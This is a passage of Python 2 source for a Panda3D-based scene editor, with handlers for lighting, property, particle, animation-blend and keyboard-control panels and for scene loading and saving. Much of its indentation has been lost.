# So, in here we will call dataHolder(AllScene) to get the target light node
# Then, this function will put this light node back into lighting
# panel and update the data on the panel.
#################################################################
lightNode = AllScene.getLightNode(lightName)
if self.lightingPanel != None:
self.lightingPanel.updateDisplay(lightNode)
return
def addLight(self, type):
#################################################################
# addLight(self, type)
# This function will be called when user try to add a light from lightingPanel
# (by sending out the message)
# So, in here we will call dataHolder(AllScene) to create a default light node
# by the type that user assigned.
# Then, this function will put this light node back into lighting
# panel with the newest lighting list and update the data on the panel.
#################################################################
list, lightNode = AllScene.createLight(type = type)
if self.lightingPanel != None:
self.lightingPanel.updateList(list,lightNode)
self.makeDirty()
return
def lightingPanelClose(self):
#################################################################
# lightingPanelClose(self)
# This function will be called when user try to close the lighting panel
# This function will re-config the state of the lighting panel button on the top screen
# And it will set the self.lightingPanel to None
#################################################################
self.menuPanel.entryconfig('Lighting Panel', state=NORMAL)
self.lightingPanel = None
return
def openPropertyPanel(self, nodePath = None):
#################################################################
# openPropertyPanel(self, nodePath = None)
# This function will be called when user try to open a property window
# for one specific node in the scene.
# Here we will call dataHolder to get the basic properties
# we would like to let user to see and cange.
# And then we pass those information into propertyWindow
#################################################################
type, info = AllScene.getInfoOfThisNode(nodePath)
name = nodePath.getName()
if not self.propertyWindow.has_key(name):
self.propertyWindow[name] = propertyWindow(nodePath, type,info )
pass
def closePropertyWindow(self, name):
if self.propertyWindow.has_key(name):
del self.propertyWindow[name]
return
def openMetadataPanel(self,nodePath=None):
print nodePath
self.MetadataPanel=MetadataPanel(nodePath)
pass
def duplicate(self, nodePath = None):
#################################################################
# duplicate(self, nodePath = None)
# This function will be called when user try to open the duplication window
#################################################################
print '----Duplication!!'
if nodePath != None:
self.duplicateWindow = duplicateWindow(nodePath = nodePath)
pass
def remove(self, nodePath = None):
#################################################################
# remove(self, nodePath = None)
# This function will be called when user try to delete a node from scene
#
# For safty issue,
# we will do deselect first then remove the certain node.
#
#################################################################
if nodePath==None:
if self.nodeSelected == None:
return
nodePath = self.nodeSelected
self.deSelectNode()
if AllScene.isLight(nodePath.getName()):
self.removeLight(nodePath)
else:
AllScene.removeObj(nodePath)
pass
def addDummyNode(self, nodepath = None):
#################################################################
# addDummyNode(self, nodepath = None)
# This function will be called when user try to create a dummy node into scene
#
# Here we will call dataHolder to create a dummy node
# and reparent it to the nodePath that user has assigned.
#
#################################################################
AllScene.addDummyNode(nodepath)
self.makeDirty()
pass
def addCollisionObj(self, nodepath = None):
#################################################################
# addCollisionObj(self, nodepath = None)
# This function will be called when user try to create a collision object into the scene
#
# Here we will call collisionWindow to ask user what kind of collision objects they want to have.
# Then, send the information and generated collision object to dataHolder to finish the whole process
# and reparent it to the nodePath that user has assigned.
#
#################################################################
self.collisionWindow = collisionWindow(nodepath)
pass
def setAsReparentTarget(self, nodepath = None):
#################################################################
# setAsReparentTarget(self, nodepath = None)
# This function will be called when user select a nodePaht
# and want to reparent other node under it. (Drom side window pop-up nemu)
#################################################################
SEditor.setActiveParent(nodepath)
return
def reparentToNode(self, nodepath = None):
#################################################################
# reparentToNode(self, nodepath = None)
# This function will be call when user try to reparent a node to
# that node he selected as a reparent target before.
#
# The whole reparent process is handled by seSession,
# which is tunned from DirectSession
#
#################################################################
SEditor.reparent(nodepath, fWrt = 1)
return
def openPlacerPanel(self, nodePath = None):
#################################################################
# openPlacerPanel(self, nodePath = None)
# This function will be call when user try to open a placer panel.
# This call will only success if there is no other placer panel been activated
#################################################################
if(self.placer==None):
self.placer = Placer()
self.menuPanel.entryconfig('Placer Panel', state=DISABLED)
return
def closePlacerPanel(self):
#################################################################
# closePlacerPanel(self)
# This function will be called when user close the placer panel.
# Here we will reset the self.placer back to None.
# (You can think this is just like a reference count)
#################################################################
self.placer = None
self.menuPanel.entryconfig('Placer Panel', state=NORMAL)
return
def openAnimPanel(self, nodePath = None):
#################################################################
# openAnimPanel(self, nodePath = None)
# This function will be called when user tries to open an Animation Panel
# This will generated a panel and put it
# into a dictionary using the actor's name as an index.
# So, if there already has an animation panel for the target actor,
# it won't allow user to open another one.
#################################################################
name = nodePath.getName()
if AllScene.isActor(name):
if self.animPanel.has_key(name):
print '---- You already have an animation panel for this Actor!'
return
else:
Actor = AllScene.getActor(name)
self.animPanel[name] = seAnimPanel.AnimPanel(aNode=Actor)
pass
def openMoPathPanel(self, nodepath = None):
#################################################################
# openMoPathPanel(self, nodepath = None)
# This function will open a Motion Path Recorder for you.
#################################################################
if self.MopathPanel == None:
self.MopathPanel = MopathRecorder()
pass
def mopathClosed(self):
self.MopathPanel = None
return
def changeName(self, nodePath, nName):
#################################################################
# changeName(self, nodePath, nName)
# This function will be called when user tries to change the name of the node
#################################################################
oName = nodePath.getName() # I need this line in order to check the obj name in the control panel.
AllScene.rename(nodePath,nName)
# reset the list in the controller panel if it has been opened.
if (self.controllerPanel) != None:
list = AllScene.getAllObjNameAsList()
self.controllerPanel.resetNameList(list = list, name = oName, nodePath = nodePath)
return
    # Handlers for the items under the File menu
def newScene(self):
#################################################################
# newScene(self)
# This function will clear whole stuff in the scene
# and will reset the application title to "New Scene"
#################################################################
self.closeAllSubWindows() ## Close all sub window
if(self.CurrentFileName):
currentF=Filename(self.CurrentFileName)
self.CurrentFileName=None
AllScene.resetAll()
currentModName=currentF.getBasenameWoExtension()
# Let us actually remove the scene from sys modules... this is done because every scene is loaded as a module
# And if we reload a scene python wont reload since its already in sys.modules... and hence we delete it
# If there is ever a garbage colleciton bug..this might be a point to look at
if sys.modules.has_key(currentModName):
del sys.modules[currentModName]
print sys.getrefcount(AllScene.theScene)
del AllScene.theScene
else:
AllScene.resetAll()
self.parent.title('Scene Editor - New Scene')
pass
def openScene(self):
#################################################################
# openScene(self)
#################################################################
# In the future try and provide merging of two scenes
if(self.CurrentFileName or self.Dirty):
saveScene = tkMessageBox._show("Load scene","Save the current scene?",icon = tkMessageBox.QUESTION,type = tkMessageBox.YESNOCANCEL)
if (saveScene == "yes"):
self.saveScene()
elif (saveScene == "cancel"):
return
self.closeAllSubWindows() ## Close all sub window
if(self.CurrentFileName):
currentF=Filename(self.CurrentFileName)
AllScene.resetAll()
currentModName=currentF.getBasenameWoExtension()
# Let us actually remove the scene from sys modules... this is done because every scene is loaded as a module
# And if we reload a scene python wont reload since its already in sys.modules... and hence we delete it
# If there is ever a garbage colleciton bug..this might be a point to look at
if sys.modules.has_key(currentModName):
del sys.modules[currentModName]
print sys.getrefcount(AllScene.theScene)
del AllScene.theScene
else:
AllScene.resetAll()
self.CurrentFileName = AllScene.loadScene()
if(self.CurrentFileName==None):
return
thefile=Filename(self.CurrentFileName)
thedir=thefile.getFullpathWoExtension()
print "SCENE EDITOR::" + thedir
self.CurrentDirName=thedir
if self.CurrentFileName != None:
self.parent.title('Scene Editor - '+ Filename.fromOsSpecific(self.CurrentFileName).getBasenameWoExtension())
if self.lightingPanel !=None:
lightList=AllScene.getList()
self.lightingPanel.updateList(lightList)
messenger.send('SGE_Update Explorer',[render])
# Close the side window in order to reset all world settings to fit the scene we have loaded.
self.sideWindow.quit()
# Try to re-open the side window again
while self.sideWindow == None:
wColor = base.getBackgroundColor()
self.worldColor[0] = wColor.getX()
self.worldColor[1] = wColor.getY()
self.worldColor[2] = wColor.getZ()
self.worldColor[3] = wColor.getW()
self.lightEnable = 1
self.ParticleEnable = 1
self.collision = 1
self.openSideWindow()
def saveScene(self):
#################################################################
# saveScene(self)
# If this is an open file call saveAsScene
# or else instantiate FileSaver from seFileSaver.py and pass it the filename
# If this filename exists in sys.modules you cannot use it
#################################################################
if(self.CurrentFileName):
f=FileSaver()
f.SaveFile(AllScene,self.CurrentFileName,self.CurrentDirName,1)
self.Dirty=0
else:
self.saveAsScene()
pass
def saveAsBam(self):
fileName = tkFileDialog.asksaveasfilename(filetypes = [("BAM",".bam")],title = "Save Scenegraph as Bam file")
theScene=render.find("**/Scene")
if not theScene is None:
theScene.writeBamFile(fileName)
else:
render.writeBamFile(fileName+".bad")
print " Scenegraph saved as :" +str(fileName)
def loadFromBam(self):
fileName = tkFileDialog.askopenfilename(filetypes = [("BAM",".bam")],title = "Load Scenegraph from Bam file")
if not fileName is None:
d=path(fileName)
scene=loader.loadModel(d.relpath())
scene.reparentTo(render)
def saveAsScene(self):
#################################################################
# saveAsScene(self)
# Ask for filename using a file save dialog
# If this filename exists in sys.modules you cannot use it
# Instantiate FileSaver from seFileSaver.py and pass it the filename
#################################################################
fileName = tkFileDialog.asksaveasfilename(filetypes = [("PY","py")],title = "Save Scene")
if(not fileName):
return
fCheck=Filename(fileName)
#print fCheck.getBasenameWoExtension()
###############################################################################
# !!!!! See if a module exists by this name... if it does you cannot use this filename !!!!!
###############################################################################
if(sys.modules.has_key(fCheck.getBasenameWoExtension())):
tkMessageBox.showwarning(
"Save file",
"Cannot save with this name because there is a system module with the same name. Please resave as something else."
)
return
self.CurrentDirName=fileName
fileName=fileName+".py"
f=FileSaver()
self.CurrentFileName=fileName
f.SaveFile(AllScene,fileName,self.CurrentDirName,0)
self.Dirty=0
self.parent.title('Scene Editor - '+ Filename.fromOsSpecific(self.CurrentFileName).getBasenameWoExtension())
pass
def loadModel(self):
#################################################################
# loadModel(self)
# This function will be called when user tries to load a model into the scene.
# Here we will pop-up a dialog to ask user which model file should be loaded in.
# Then, pass the path to dataHolder to load the model in.
#################################################################
modelFilename = askopenfilename(
defaultextension = '.egg',
filetypes = (('Egg Files', '*.egg'),
('Bam Files', '*.bam'),
('All files', '*')),
initialdir = '.',
title = 'Load New Model',
parent = self.parent)
if modelFilename:
self.makeDirty()
if not AllScene.loadModel(modelFilename, Filename.fromOsSpecific(modelFilename)):
print '----Error! No Such Model File!'
pass
def loadActor(self):
#################################################################
# loadActor(self)
# This function will be called when user tries to load an Actor into the scene.
# Here we will pop-up a dialog to ask user which Actor file should be loaded in.
# Then, pass the path to dataHolder to load the Actor in.
#################################################################
ActorFilename = askopenfilename(
defaultextension = '.egg',
filetypes = (('Egg Files', '*.egg'),
('Bam Files', '*.bam'),
('All files', '*')),
initialdir = '.',
title = 'Load New Actor',
parent = self.parent)
if ActorFilename:
self.makeDirty()
if not AllScene.loadActor(ActorFilename, Filename.fromOsSpecific(ActorFilename)):
print '----Error! No Such Model File!'
pass
def importScene(self):
self.makeDirty()
print '----God bless you Please Import!'
pass
    ## Handlers for the items under the Edit menu
    def unDo(self):
        # TODO: undo support is not implemented yet; this is a menu stub.
        pass
    def reDo(self):
        # TODO: redo support is not implemented yet; this is a menu stub.
        pass
    def deSelectNode(self, nodePath=None):
        #################################################################
        # deSelectNode(self, nodePath=None)
        # This function will deselect the node which we have selected currently.
        # This will also remove the monitor task which monitor selected object's
        # position, orientation and scale each frame.
        #################################################################
        # Tell seSession first, if a specific node was handed in.
        if nodePath != None:
            self.seSession.deselect(nodePath)
        if self.isSelect:
            # Clear local selection state and grey out all selection-
            # dependent Edit-menu entries.
            self.isSelect = False
            #if self.nodeSelected != None:
            #    self.nodeSelected.hideBounds()
            self.nodeSelected =None
            self.menuEdit.entryconfig('Deselect', state=DISABLED)
            self.menuEdit.entryconfig('Add Dummy', state=DISABLED)
            self.menuEdit.entryconfig('Duplicate', state=DISABLED)
            self.menuEdit.entryconfig('Remove', state=DISABLED)
            self.menuEdit.entryconfig('Object Properties', state=DISABLED)
            # Mirror the deselection in the side window's tree, if open.
            if self.sideWindowCount==1:
                self.sideWindow.SGE.deSelectTree()
            # Stop the per-frame pos/hpr/scale monitor for the old selection.
            if taskMgr.hasTaskNamed('seMonitorSelectedNode'):
                taskMgr.remove('seMonitorSelectedNode')
            return
        pass
def addDummy(self):
#################################################################
# addDummy(self)
# This function will do nothing but call other function
# to add a dummy into the scene.
#
# Ok... this is really redundancy...
#
#################################################################
self.addDummyNode(self.nodeSelected)
pass
def duplicateNode(self):
#################################################################
# duplicateNode(self)
# This function will do nothing but call other function
# to open the duplication window.
#
# Ok... this is really redundancy...
#
#################################################################
if self.nodeSelected!=None:
self.duplicate(self.nodeSelected)
pass
def removeNode(self):
#################################################################
# removeNode(self)
# This function will do nothing but call other function
# to remove the current selected node..
#
# Ok... this is really redundancy...
#
################################################################
self.remove(self.nodeSelected)
pass
def showObjProp(self):
################################################################
# showObjProp(self)
# This function will do nothing but call other function
# to open the property window of current selected node..
#
# Ok... this is really redundancy...
#
################################################################
self.openPropertyPanel(self.nodeSelected)
pass
def showCameraSetting(self):
################################################################
# showCameraSetting(self)
# This function will do nothing but call other function
# to open the property window of camera..
#
# Ok... this is really redundancy...
#
################################################################
self.openPropertyPanel(camera)
pass
def showRenderSetting(self):
'''Currently, no idea what gonna pop-out here...'''
pass
    ## Handlers for the items under the Panel menu
def openSideWindow(self):
################################################################
# openSideWindow(self)
# This function will open the side window and set the reference number
# so that we can make sure there won't have two or more side windows in the same time.
################################################################
if self.sideWindowCount==0:
self.sideWindow = sideWindow(worldColor = self.worldColor,
lightEnable = self.lightEnable,
ParticleEnable = self.ParticleEnable,
basedriveEnable = self.basedriveEnable,
collision = self.collision,
backface = self.backface,
texture = self.texture,
wireframe = self.wireframe,
grid = self.grid,
widgetVis = self.widgetVis,
enableAutoCamera = self.enableAutoCamera)
self.sideWindowCount = 1
self.menuPanel.entryconfig('Side Window', state=DISABLED)
return
def openAnimationPanel(self):
################################################################
# openAnimationPanel(self)
# This function will do nothing but call other function
# to open the animation window for selected node(if it is an Actor)..
#
# Ok... this is really redundancy...
#
################################################################
if AllScene.isActor(self.nodeSelected):
self.openAnimPanel(self.nodeSelected)
pass
def openMopathPanel(self):
################################################################
# openMopathPanel(self)
# This function will create a Motion Path Recorder
################################################################
MopathPanel = MopathRecorder()
pass
def toggleParticleVisable(self, visable):
################################################################
# toggleParticleVisable(self, visable)
# This function will be called each time user has toggled
# the check box of Particle visibility in the side window.
# The reason we keep track this is because
# we have to know we should show/hide the model on the new-created particle
################################################################
self.ParticleEnable = visable
AllScene.toggleParticleVisable(visable)
return
def openLightingPanel(self):
################################################################
# openLightingPanel(self)
# open the lighting panel here.
# If there is already exist a lighting panel, then do nothing
################################################################
if self.lightingPanel==None:
self.lightingPanel = lightingPanel(AllScene.getLightList())
self.menuPanel.entryconfig('Lighting Panel', state=DISABLED)
return
def addParticleEffect(self,effect_name,effect,node):
AllScene.particleDict[effect_name]=effect
AllScene.particleNodes[effect_name]=node
if not self.ParticleEnable:
AllScene.particleNodes[effect_name].setTransparency(True)
AllScene.particleNodes[effect_name].setAlphaScale(0)
AllScene.particleNodes[effect_name].setBin("fixed",1)
return
    def openParticlePanel(self):
        # Open the particle panel (single instance).  With no existing
        # effects an empty panel is created; otherwise the panel is seeded
        # with an effect plus the full effects dict.
        if self.particlePanel != None:
            ## There already has a Particle panel!
            return
        if(len(AllScene.particleDict)==0):
            self.particlePanel=seParticlePanel.ParticlePanel()
        else:
            # NOTE(review): this loop re-creates the panel once per effect
            # and keeps only the last one -- looks unintentional; confirm
            # before simplifying.
            for effect in AllScene.particleDict:
                theeffect=AllScene.particleDict[effect]
                self.particlePanel=seParticlePanel.ParticlePanel(particleEffect=theeffect,effectsDict=AllScene.particleDict)
        pass
def closeParticlePanel(self):
self.particlePanel = None
return
def openInputPanel(self):
if self.controllerPanel==None:
list = AllScene.getAllObjNameAsList()
type, dataList = AllScene.getControlSetting()
self.controllerPanel = controllerWindow(listOfObj = list, controlType = type, dataList = dataList)
pass
def closeInputPanel(self):
self.controllerPanel = None
return
def requestObjFromControlW(self, name):
################################################################
# requestObjFromControlW(self, name)
# Call back function
# Each time when user selects a node from Control Panel,
# this function will be called.
# This function will get the actual nodePath from dataHolder and then
# set it back into controller panel
################################################################
node = AllScene.getObjFromSceneByName(name)
if (self.controllerPanel) != None and (node!=None):
self.controllerPanel.setNodePathIn(node)
return
def setControlSet(self, controlType, dataList):
if controlType == 'Keyboard':
self.controlTarget = dataList[0]
self.keyboardMapDict.clear()
self.keyboardMapDict = dataList[1].copy()
self.keyboardSpeedDict.clear()
self.keyboardSpeedDict = dataList[2].copy()
return
    def startControl(self, controlType, dataList):
        # Begin driving the chosen node from an input device.  If a control
        # session is already active, tear it down first so we never react
        # to key events from a stale configuration.
        if not self.enableControl:
            self.enableControl = True
        else:
            # Stop the current control setting first
            # Also this will make sure we won't catch wrong keyboard message
            self.stopControl(controlType)
            self.enableControl = True
        self.setControlSet(controlType, dataList)
        self.lastContorlTimer = globalClock.getFrameTime()
        if controlType == 'Keyboard':
            self.controlType = 'Keyboard'
            # Per-key pressed/released flags (0/1), reset on every start.
            self.keyControlEventDict = {}
            # Hidden helper node used to accumulate per-frame deltas in the
            # target's own coordinate space (see keyboardControlTask).
            self.transNodeKeyboard = self.controlTarget.attachNewNode('transformNode')
            self.transNodeKeyboard.hide()
            for index in self.keyboardMapDict:
                self.keyControlEventDict[index] = 0
                # 'a = index' binds the loop variable at definition time --
                # without the default argument every lambda would see the
                # final value of 'index'.
                self.accept(self.keyboardMapDict[index], lambda a = index:self.keyboardPushed(a))
                self.accept(self.keyboardMapDict[index]+'-up', lambda a = index:self.keyboardReleased(a))
        return
    def stopControl(self, controlType):
        # Stop device control of the target node: unhook all key events,
        # kill the per-frame task and discard the helper transform node.
        if not self.enableControl:
            return
        if controlType == 'Keyboard':
            self.enableControl = False
            for index in self.keyboardMapDict:
                self.ignore(self.keyboardMapDict[index])
                self.ignore(self.keyboardMapDict[index]+'-up')
            taskMgr.remove("KeyboardControlTask")
            # Remove the helper node created by startControl().
            self.transNodeKeyboard.removeNode()
        return
def keyboardPushed(self, key):
self.keyControlEventDict[key] = 1
if not taskMgr.hasTaskNamed("KeyboardControlTask"):
self.keyboardLastTimer = globalClock.getFrameTime()
taskMgr.add(self.keyboardControlTask, "KeyboardControlTask")
return
def keyboardReleased(self, key):
self.keyControlEventDict[key] = 0
for index in self.keyControlEventDict:
if self.keyControlEventDict[index] == 1:
return
if taskMgr.hasTaskNamed("KeyboardControlTask"):
taskMgr.remove("KeyboardControlTask")
return
    def keyboardControlTask(self, task):
        # Per-frame task: translate the currently-held key flags into
        # position / orientation / scale deltas on self.controlTarget.
        # Deltas are scaled by real elapsed time so motion speed is
        # frame-rate independent.
        newTimer = globalClock.getFrameTime()
        delta = newTimer - self.keyboardLastTimer
        self.keyboardLastTimer = newTimer
        pos = self.controlTarget.getPos()
        hpr = self.controlTarget.getHpr()
        scale = self.controlTarget.getScale()
        # Apply the frame's movement to the hidden helper node (a child of
        # the target), so the offsets are expressed in the target's own
        # coordinate space; each axis is (positive key - negative key) * speed.
        self.transNodeKeyboard.setPosHpr((self.keyControlEventDict['KeyRight']*self.keyboardSpeedDict['SpeedRight']-self.keyControlEventDict['KeyLeft']*self.keyboardSpeedDict['SpeedLeft'])*delta,
                                         (self.keyControlEventDict['KeyForward']*self.keyboardSpeedDict['SpeedForward']-self.keyControlEventDict['KeyBackward']*self.keyboardSpeedDict['SpeedBackward'])*delta,
                                         (self.keyControlEventDict['KeyUp']*self.keyboardSpeedDict['SpeedUp']-self.keyControlEventDict['KeyDown']*self.keyboardSpeedDict['SpeedDown'])*delta,
                                         (self.keyControlEventDict['KeyTurnLeft']*self.keyboardSpeedDict['SpeedTurnLeft']-self.keyControlEventDict['KeyTurnRight']*self.keyboardSpeedDict['SpeedTurnRight'])*delta,
                                         (self.keyControlEventDict['KeyTurnUp']*self.keyboardSpeedDict['SpeedTurnUp']-self.keyControlEventDict['KeyTurnDown']*self.keyboardSpeedDict['SpeedTurnDown'])*delta,
                                         (self.keyControlEventDict['KeyRollLeft']*self.keyboardSpeedDict['SpeedRollLeft']-self.keyControlEventDict['KeyRollRight']*self.keyboardSpeedDict['SpeedRollRight'])*delta)
        # Read the helper's transform back relative to the target's parent:
        # that is the target's new parent-space pos/hpr.
        newPos = self.transNodeKeyboard.getPos(self.controlTarget.getParent())
        newHpr = self.transNodeKeyboard.getHpr(self.controlTarget.getParent())
        # Scale is handled additively: a uniform term plus per-axis terms.
        overAllScale = self.keyControlEventDict['KeyScaleUp']*self.keyboardSpeedDict['SpeedScaleUp']-self.keyControlEventDict['KeyScaleDown']*self.keyboardSpeedDict['SpeedScaleDown']
        newScale = Point3(scale.getX() + (overAllScale + self.keyControlEventDict['KeyScaleXUp']*self.keyboardSpeedDict['SpeedScaleXUp'] - self.keyControlEventDict['KeyScaleXDown']*self.keyboardSpeedDict['SpeedScaleXDown'])*delta,
                          scale.getY() + (overAllScale + self.keyControlEventDict['KeyScaleYUp']*self.keyboardSpeedDict['SpeedScaleYUp'] - self.keyControlEventDict['KeyScaleYDown']*self.keyboardSpeedDict['SpeedScaleYDown'])*delta,
                          scale.getZ() + (overAllScale + self.keyControlEventDict['KeyScaleZUp']*self.keyboardSpeedDict['SpeedScaleZUp'] - self.keyControlEventDict['KeyScaleZDown']*self.keyboardSpeedDict['SpeedScaleZDown'])*delta
                          )
        self.controlTarget.setPos(newPos.getX(), newPos.getY() , newPos.getZ())
        self.controlTarget.setHpr(newHpr.getX(), newHpr.getY() , newHpr.getZ())
        self.controlTarget.setScale(newScale.getX(),newScale.getY(),newScale.getZ())
        # Reset the helper so next frame's deltas start from zero.
        self.transNodeKeyboard.setPosHpr(0,0,0,0,0,0)
        return Task.cont
    ## Misc
    ##### These handle selection events from SGE (Scene Graph Explorer) and from picking
    def selectNode(self, nodePath=None, callBack = True):
        ################################################################
        # selectNode(self, nodePath=None, callBack = True)
        # This will be called when user try to select nodes from the
        # side window.
        # It will also call seSession to select this node in order to keep data's consistency
        ################################################################
        if nodePath==None:
            # Nothing to select: clear selection state and stop the monitor task.
            self.isSelect = False
            self.nodeSelected =None
            if taskMgr.hasTaskNamed('seMonitorSelectedNode'):
                taskMgr.remove('seMonitorSelectedNode')
            return
        else:
            self.isSelect = True
            #if self.nodeSelected != None:
            #    self.nodeSelected.hideBounds()
            self.nodeSelected = nodePath
            #self.nodeSelected.showBounds()
            # Re-enable all selection-dependent Edit-menu entries.
            self.menuEdit.entryconfig('Deselect', state=NORMAL)
            self.menuEdit.entryconfig('Add Dummy', state=NORMAL)
            self.menuEdit.entryconfig('Duplicate', state=NORMAL)
            self.menuEdit.entryconfig('Remove', state=NORMAL)
            self.menuEdit.entryconfig('Object Properties', state=NORMAL)
            # callBack=True means the selection originated here, so we must
            # also tell seSession (selectFromScene passes callBack=False to
            # avoid the two select paths calling each other forever).
            if callBack:
                self.seSession.select(nodePath,fResetAncestry=1)
            messenger.send('SGE_Update Explorer',[render])
            # Start the per-frame monitor of the selection's pos/hpr/scale,
            # seeding the "last seen" values used for change detection.
            if not taskMgr.hasTaskNamed('seMonitorSelectedNode'):
                self.oPos = self.nodeSelected.getPos()
                self.oHpr = self.nodeSelected.getHpr()
                self.oScale = self.nodeSelected.getScale()
                taskMgr.add(self.monitorSelectedNodeTask, 'seMonitorSelectedNode')
            return
        pass
    def selectFromScene(self, nodePath=None, callBack=True):
        ################################################################
        # selectFromScene(self, nodePath=None, callBack = True)
        # This will be called when user try to select nodes from the
        # scene. (By picking)
        # Actually this will be called by seSession
        # The reason we make two selections is we don't want they call each other and never stop...
        ################################################################
        if nodePath==None:
            # Nothing picked: clear selection state and stop the monitor task.
            self.isSelect = False
            self.nodeSelected =None
            if taskMgr.hasTaskNamed('seMonitorSelectedNode'):
                taskMgr.remove('seMonitorSelectedNode')
            return
        else:
            self.isSelect = True
            #if self.nodeSelected != None:
            #    self.nodeSelected.hideBounds()
            self.nodeSelected = nodePath
            #self.nodeSelected.showBounds()
            # Re-enable all selection-dependent Edit-menu entries.
            self.menuEdit.entryconfig('Deselect', state=NORMAL)
            self.menuEdit.entryconfig('Add Dummy', state=NORMAL)
            self.menuEdit.entryconfig('Duplicate', state=NORMAL)
            self.menuEdit.entryconfig('Remove', state=NORMAL)
            self.menuEdit.entryconfig('Object Properties', state=NORMAL)
            # Mirror the pick in the side window's tree (unlike selectNode,
            # seSession is NOT called back here -- it initiated this call).
            self.sideWindow.SGE.selectNodePath(nodePath,callBack)
            messenger.send('SGE_Update Explorer',[render])
            # Start the per-frame monitor of the selection's pos/hpr/scale,
            # seeding the "last seen" values used for change detection.
            if not taskMgr.hasTaskNamed('seMonitorSelectedNode'):
                self.oPos = self.nodeSelected.getPos()
                self.oHpr = self.nodeSelected.getHpr()
                self.oScale = self.nodeSelected.getScale()
                taskMgr.add(self.monitorSelectedNodeTask, 'seMonitorSelectedNode')
            return
        pass
    def monitorSelectedNodeTask(self, task):
        ################################################################
        # monitorSelectedNodeTask(self, task)
        # Per-frame task that tracks the position, orientation and scale
        # of the selected node and updates the status labels on screen.
        # When the transform changes it also broadcasts messages so the
        # placer and property windows stay in sync.
        ################################################################
        if self.nodeSelected != None:
            pos = self.nodeSelected.getPos()
            hpr = self.nodeSelected.getHpr()
            scale = self.nodeSelected.getScale()
            # Only broadcast when something actually changed since last frame.
            if ((self.oPos != pos )or(self.oScale != scale)or(self.oHpr != hpr)):
                # NOTE(review): 'forPorpertyWindow' is misspelled but it is the
                # channel name listeners subscribe to -- do not "fix" it alone.
                messenger.send('forPorpertyWindow'+self.nodeSelected.getName(),[pos, hpr, scale])
                messenger.send('placerUpdate')
                self.oPos = pos
                self.oScale = scale
                self.oHpr = hpr
            # Refresh the on-screen readouts every frame.
            self.posLabel['text'] = "Position : X: %2.2f Y: %2.2f Z: %2.2f"%(pos.getX(), pos.getY(),pos.getZ())
            self.hprLabel['text'] = "Orientation: H: %2.2f P: %2.2f R: %2.2f"%(hpr.getX(), hpr.getY(),hpr.getZ())
            self.scaleLabel['text'] = "Scale : X: %2.2f Y: %2.2f Z: %2.2f"%(scale.getX(), scale.getY(),scale.getZ())
        return Task.cont
def deselectFromScene(self):
################################################################
# deselectFromScene(self)
# This function will do nothing but call other function
# to delete selected node...
#
# Ok... this is really redundancy...
#
################################################################
self.deSelectNode(self.nodeSelected)
messenger.send('SGE_Update Explorer',[render])
    ##### Handle event requests coming from the Side Window
def lightToggle(self):
################################################################
# lightToggle(self)
# This function will do nothing but call other function
# to toggle the light...
################################################################
self.makeDirty()
AllScene.toggleLight()
return
def sideWindowClose(self,worldColor,lightEnable,ParticleEnable, basedriveEnable,collision,
backface, texture, wireframe, grid, widgetVis, enableAutoCamera):
################################################################
# sideWindowClose(self,worldColor,lightEnable,ParticleEnable, basedriveEnable,collision,
# backface, texture, wireframe, grid, widgetVis, enableAutoCamera):
# This function will be called when user close the side window.
# Here we will restore all parameters about world setting back in the sceneEditor.
# So, when next time people recall the side window, it will still keep the same world setting.
################################################################
if self.sideWindowCount==1:
self.worldColor = worldColor
self.lightEnable = lightEnable
self.ParticleEnable = ParticleEnable
self.basedriveEnable = basedriveEnable
self.collision = collision
self.backface = backface
self.texture = texture
self.wireframe = wireframe
self.grid = grid
self.enableAutoCamera = enableAutoCamera
self.widgetVis = widgetVis
self.sideWindowCount=0
self.sideWindow = None
self.menuPanel.entryconfig('Side Window', state=NORMAL)
return
## Process message from Duplication Window
def duplicationObj(self, nodePath, pos, hpr, scale, num):
################################################################
# duplicationObj(self, nodePath, pos, hpr, scale, num)
# This function will do nothing but call other function
# to duplicate selected node...
#
# Ok... this is really redundancy...
#
################################################################
AllScene.duplicateObj(nodePath, pos, hpr, scale, num)
return
## Process message from Animation Panel
def animationLoader(self, nodePath, Dic):
name = nodePath.getName()
AllScene.loadAnimation(name, Dic)
return
def animationRemove(self, nodePath, name):
AllScene.removeAnimation(nodePath.getName(),name)
return
def animPanelClose(self, name):
if self.animPanel.has_key(name):
del self.animPanel[name]
return
### Blend Animation Panel
def openBlendAnimPanel(self, nodePath=None):
################################################################
# openBlendAnimPanel(self, nodePath=None)
# This function will get the user defined blending animation data from dataHolder.
# And then open a blendAnimPanel by passing those data in.
################################################################
name = nodePath.getName()
if AllScene.isActor(name):
if self.animBlendPanel.has_key(name):
print '---- You already have an Blend Animation Panel for this Actor!'
return
else:
Actor = AllScene.getActor(name)
Dict = AllScene.getBlendAnimAsDict(name)
self.animBlendPanel[name] = BlendAnimPanel(aNode=Actor, blendDict=Dict)
pass
return
def animBlendPanelSave(self, actorName, blendName, animNameA, animNameB, effect):
################################################################
# animBlendPanelSave(self, actorName, blendName, animNameA, animNameB, effect)
# This function will call dataHolder to save the blended animation.
# Then, it will reset the newest blended animation list back to animBlendPanel
################################################################
dict = AllScene.saveBlendAnim(actorName, blendName, animNameA, animNameB, effect)
self.animBlendPanel[actorName].setBlendAnimList(dict)
return
def animBlendPanelRemove(self, actorName, blendName):
################################################################
# animBlendPanelRemove(self, actorName, blendName)
# This function will call dataHolder to remove the blended animation.
# Then, it will reset the newest blended animation list back to animBlendPanel
################################################################
dict = AllScene.removeBlendAnim(actorName, blendName)
self.animBlendPanel[actorName].setBlendAnimList(dict, True)
return
def animBlendPanelRename(self, actorName, nName, oName, animNameA, animNameB, effect):
################################################################
# animBlendPanelRename(self, actorName, nName, oName, animNameA, animNameB, effect)
# This function will call dataHolder to rename the blended animation.
# Then, it will reset the newest blended animation list back to animBlendPanel
################################################################
dict = AllScene.renameBlendAnim(actorName, nName, oName, animNameA, animNameB, effect)
self.animBlendPanel[actorName].setBlendAnimList(dict)
return
def animBlendPanelClose(self, name):
################################################################
# animBlendPanelClose(self, name)
# This function will be called when Blend panel has been closed.
# Here we will reset the reference dictionary so it can be open again.
################################################################
if self.animBlendPanel.has_key(name):
del self.animBlendPanel[name]
return
## Process message from SEditor object
def toggleWidgetVis(self):
################################################################
# toggleWidgetVis(self)
# This function will be called when user use the hot-key to change the
# world setting. (From seSession)
# In this function we will restore the change and let side window know
# the hot-key ahs been pushed.
################################################################
if self.sideWindow != None:
self.sideWindow.toggleWidgetVisFromMainW()
else:
self.widgetVis = (self.widgetVis+1)%2
def toggleBackface(self):
################################################################
# toggleBackface(self)
# This function will be called when user use the hot-key to change the
# world setting. (From seSession)
